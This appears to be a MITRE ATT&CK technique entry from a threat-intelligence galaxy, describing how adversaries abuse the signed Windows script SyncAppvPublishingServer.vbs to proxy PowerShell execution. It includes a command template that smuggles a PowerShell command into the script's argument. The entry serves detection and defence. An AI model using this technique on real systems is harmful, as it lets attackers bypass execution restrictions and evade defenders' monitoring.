SyncAppvPublishingServer - T1216.002 (e6f19759-dde3-47fc-99cc-d9f5fa4ade60)
Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)
The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from \System32
through the command line via wscript.exe
.(Citation: 4 - appv)(Citation: 5 - appv)
Adversaries may abuse SyncAppvPublishingServer.vbs to bypass PowerShell execution restrictions and evade defensive counter measures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking powershell.exe
.(Citation: 7 - appv)
For example, PowerShell commands may be invoked using:(Citation: 5 - appv)
SyncAppvPublishingServer.vbs "n; {PowerShell}"
Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
---|---|---|---|---|
System Script Proxy Execution - T1216 (f6fe9070-7a65-49ea-ae72-76292f42cebe) | Attack Pattern | SyncAppvPublishingServer - T1216.002 (e6f19759-dde3-47fc-99cc-d9f5fa4ade60) | Attack Pattern | 1 |